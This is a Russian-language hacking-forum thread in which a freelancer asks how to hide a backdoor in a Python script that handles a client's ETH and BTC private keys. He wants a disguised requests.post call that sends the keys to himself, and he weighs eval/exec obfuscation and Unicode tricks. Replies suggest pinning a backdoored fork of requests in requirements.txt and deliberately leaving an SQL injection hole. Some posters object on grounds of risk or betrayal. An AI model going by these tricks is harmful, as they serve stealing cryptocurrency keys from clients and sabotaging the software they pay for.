• XSS.stack #1 – первый литературный журнал от юзеров форума

Как спрятать бэкдор в питон скрипте?

Пожалуйста, обратите внимание, что пользователь заблокирован
Щас спалишься, тебе оставят не лучшие комментарии по поводу твоей работы, не получишь денег и прослывешь крысой. На авось надеятся в таком нельзя. А вдруг он лох? Любой лох проверит или даст кому то проверить скрипты после непонятных фрилансеров, в наше время любой ребёнок понимает что наебать могут везде, а если в этом деле фигурируют деньги , то попробуют наебать 99.99% незнакомых людей.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Щас спалишься, тебе оставят не лучшие комментарии по поводу твоей работы, не получишь денег и прослывешь крысой. На авось надеятся в таком нельзя. А вдруг он лох? Любой лох проверит или даст кому то проверить скрипты после непонятных фрилансеров, в наше время любой ребёнок понимает что наебать могут везде, а если в этом деле фигурируют деньги , то попробуют наебать 99.99% незнакомых людей.
Да и знакомых наебывают/пытаются наебать, как показывает тенденция, в больше, чем 50% случаях)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Да и знакомых наебывают/пытаются наебать, как показывает тенденция, в больше, чем 50% случаях)
Пока ты нужен людям - тебя не наебут, но опять же это временно. Есть конечно порядочные люди. Но суть в том чтобы наперед видеть сущность людей, стараться не допускать ситуаций где тебе придется положиться на кого то . Тогда и не наебут. Ведь наебывают в большинстве тех, кто допустил такую ситуацию в которой он доверился незнакомому или малознакомому человеку. Потому надо всегда думать, не доверять никому, вышел из метро - надел колпак из фольги. Это второе негласное правило безопасности.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
вышел из метро - надел колпак из фольги. Это второе негласное правило.
Бля, вот в чем дело-то, оказывается. А я всё думаю, чо на меня в метро смотрят, как на дебила - я не снимая колпак езжу прост и телефон у меня в чехольчике из фольги тоже, вместе с картами(
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Бля, вот в чем дело-то, оказывается. А я всё думаю, чо на меня в метро смотрят, как на дебила - я не снимая колпак езжу прост и телефон у меня в чехольчике из фольги тоже, вместе с картами(
обращайся
hqdefault.jpg
 
Пожалуйста, обратите внимание, что пользователь заблокирован
не стоит рисковать ради возможно удачного исхода, причем успешный исход твоего мува - это где то 5-10%
 
автор говорит, что скрипт по ТЗ должен быть без зависимостей, а сам юзает requests... Хм, ну допустим.
А ты кстати прав, форкнуть requests, дописать бэкдор и вставить в requirements.txt что-то вроде:
Код:
package-one==1.9.4
git+git://github.com/xakep228/requests.git@my-branch#egg=requests
package-three==1.0.1
 
Заказчик тоже не дурак ...

Если садишься за карточный стол не зная заранее кто из сидящих за этим столом дурак который будет платить, это означает что дурак это ты, а потому лучшее что можешь сделать это сказать что вдруг занемог животом и быстро уйти.

Я бы наместе того человека, котырый как ты говоришь не дурак, при обнаружении бекдор прикинулся бы шлангом и поиграл бы в очень интересные игры.
 
Здравствуйте,
иногда занимаюсь фрилансом, получил заказ написать скрипт, который обработает очень вкусную инфу(приватные ключи ETH и BTC). Но т.к. заказчик мне не родственник, ни друг и из недружественной страны, я очень хотел бы, что скрипт отправил эту инфу мне. Заказчик тоже не дурак, он требует, что скрипт был только из одного файла, без каких либо внешних библиотек. В принципе мне надо как то спрятать в скрипте одну строку:
Python:
requests.post('url', 'инфа')
Если я пошифрую эту строку кода и пробую такие варианты, как:
Python:
eval('пошифрованный код')
или
exec('пошифрованный код')
то сразу создает подозрение. Может у кого есть другие идеи? Какие нибудь хитрости с юникодом? За дельный совет, и если он прокатит, обещаю 10% от выхлопа. Гарантий, конечно немогу дать, просто честное слово :)
Скрипт только обрабатывает инфу? В БД не пишет? Если пишет оставь возможность для SQL инъекции.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Человек тебе деньги за работу платит, а ты его кинуть пытаешься.
Сегодня ты его кинешь, завтра кого-то из нас, продолжай в том же духе .... и все у тебя получиться ..
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх